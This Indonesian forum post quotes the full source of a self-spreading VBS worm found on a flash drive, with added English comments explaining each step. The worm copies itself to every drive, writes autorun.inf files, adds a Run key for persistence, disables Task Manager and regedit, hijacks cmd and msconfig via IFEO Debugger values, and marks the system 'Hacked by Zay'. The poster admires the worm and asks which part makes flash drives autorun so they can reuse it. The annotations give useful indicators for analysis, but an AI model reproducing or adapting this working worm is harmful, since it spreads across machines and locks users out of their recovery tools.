Kemarin saya dapet file vbs dari flash disk temen yang pc-nya terinfeksi
sesuatu. jadi tu pc ngopi file vbs kemana2, yang isinya hampir sama, salah
satu variannya:
=================================================
'My name is Slow but sure V1.08
' --- Analyst annotations (comments only; every code line is unchanged) ---
' Summary of what the visible code does: it reads its own source text, writes
' a copy named r4n694-24y.dll.vbs into the Windows folder and into the root of
' every removable or fixed drive except A:, places an autorun.inf next to each
' drive copy, and writes a set of registry values (a Run entry, Explorer/System
' policy values, and Image File Execution Options "Debugger" values).
' The mail archive wrapped several long statements (the If ... and /
' flashdrive.path pair, and most registry paths), so conditions and string
' literals are split across lines in this listing.
' The file name and registry paths below are the indicators to look for when
' triaging a host or a USB drive.

' Runtime errors are suppressed from here on, so failing file or registry
' operations (for example GetFile on a file that does not exist yet) are
' silently skipped instead of stopping the script.
on error resume next
dim rekursif,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
' Text that is later written to autorun.inf: an [autorun] section whose
' shellexecute entry starts the dropped script through wscript.exe. This file
' in the drive root is what ties the drive's AutoRun handling to the script.
' Mitigation: disable AutoRun for removable media (NoDriveTypeAutoRun policy).
' Detection: an autorun.inf in a drive root that names wscript.exe or a .vbs.
atr = "[autorun]" & vbcrlf & "shellexecute=wscript.exe r4n694-24y.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
' mf is the File object for the script that is currently running.
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
' size is assigned here but not read again in the visible listing.
size = mf.size
' DriveType of the drive the script was started from; in the FileSystemObject
' enumeration 1 = removable and 2 = fixed.
check = mf.drive.drivetype
' Open the running script itself for reading (1 = ForReading, -2 = system
' default text format) and collect its full text, line by line, in rekursif.
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekursif = rekursif & text.readline
rekursif = rekursif & vbcrlf
loop
' Main loop. The exit test at the bottom is "check <> 1", so the body runs
' once when started from a removable drive and repeats indefinitely otherwise.
do
' GetSpecialFolder(0) is the Windows folder.
Set winpath = fs.getspecialfolder(0)
' Attribute 32 = Archive only: clears ReadOnly/Hidden/System on an existing
' copy so that it can be overwritten. Fails silently if there is no copy yet.
set tf = fs.getfile(winpath & "\r4n694-24y.dll.vbs")
tf.attributes = 32
' Write the collected script text to <Windows folder>\r4n694-24y.dll.vbs; the
' non-zero second argument means an existing file is overwritten.
set tf=fs.createtextfile(winpath & "\r4n694-24y.dll.vbs",2,true)
tf.write rekursif
tf.close
' Attribute 39 = ReadOnly (1) + Hidden (2) + System (4) + Archive (32), which
' keeps the copy out of a default Explorer view. When hunting, list files with
' hidden and system attributes included (e.g. dir /a).
set tf = fs.getfile(winpath & "\r4n694-24y.dll.vbs")
tf.attributes = 39
' Repeat the same copy step for every drive whose type is 1 (removable) or
' 2 (fixed), skipping the path "A:".
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and
flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\r4n694-24y.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\r4n694-24y.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &"\r4n694-24y.dll.vbs")
tf.attributes = 39
' Same unhide / overwrite / re-hide sequence for autorun.inf in the drive
' root, using the atr text defined at the top. Any autorun.inf already present
' on the drive is replaced.
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf = fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
' Registry changes start here; each value is rewritten on every loop pass.
set rg = createobject("WScript.Shell")
' Cosmetic marker: sets the Internet Explorer window title text.
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title","Hacked by Zay"
' Per-user policy values. "Hidden" is set to 0 under Policies\Explorer\Advanced
' (presumably meant to keep hidden files from being shown - confirm). The
' others are set to 1: NoFind, NoFolderOptions and NoRun remove Search, Folder
' Options and Run from the shell; DisableRegistryTools and DisableTaskMgr block
' the registry editor and Task Manager. Together they remove the tools a user
' would normally reach for during cleanup.
rg.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",
"0", "REG_DWORD"
rg.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",
"1", "REG_DWORD"
rg.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",
"1", "REG_DWORD"
rg.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",
"1", "REG_DWORD"
rg.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",
"1", "REG_DWORD"
rg.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",
"1", "REG_DWORD"
' Persistence: a machine-wide Run value named r4n694-24y that points at the
' copy in the Windows folder, so the script starts again at logon. This value
' and the file it names have to be removed together during cleanup.
rg.regwrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\r4n694-24y",
winpath & "\r4n694-24y.dll.vbs"
' Image File Execution Options "Debugger" values: Windows starts the named
' debugger (notepad.exe here) in place of the listed executable. The names
' covered below are cmd.exe, install.exe, msconfig.exe, regedit.exe,
' regedt32.exe, RegistryEditor.exe and setup.exe. Any Debugger value under
' these IFEO subkeys is an indicator and must be deleted to restore the tools.
' Note that the wrapped listing shows a line break before notepad.exe in most
' of these string literals.
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","
notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","
notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","
notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","
notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","
notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution
Options\RegistryEditor.exe\Debugger","notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","
notepad.exe"
' Cosmetic markers: overwrite the registered organization and owner strings
' shown in the system properties.
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOrganization", "Don't Panic, System anda sudah
kami ambil alih !"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOwner","r4n694-24y"
' When not started from a removable drive, wait 200000 ms (200 seconds) and
' run the whole body again. A long-lived wscript.exe process whose command
' line names this .vbs file is therefore the resident instance; it has to be
' ended before the files and registry values are removed, or they are
' rewritten on the next pass.
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
' Reached only when the loop exits, i.e. when the script was started from a
' removable drive: opens an Explorer window with the script file selected
' (presumably so that the drive still appears to open normally - confirm).
set sd = createobject("Wscript.shell")
sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
==========================================================================
varian yang lain yang saya dapet, sayang sekali karena terbiasa, langsung
saya shift+del...
tapi saya sempet coba jalanin juga, dan pada intinya dia bikin flashdisk
jadi bisa autorun!!!!!!!
keren sih, jadi bisa berkreasi.....hehehehehe....
pokoknya, varian satunya itu yang bikin IE ada keterangan Hacked by Godzilla
atau siapa gitu, pokoknya ada zilla-zillanya deh. Nah, kan keren tuh, jadi saya pingin tanya nih: bagian mana dari skrip yang bisa bikin flashdisk autorun? Jadi dari My Computer, kalau kita klik kanan drive flashdisknya, ada pilihan autorun, keren deh. Makasih.
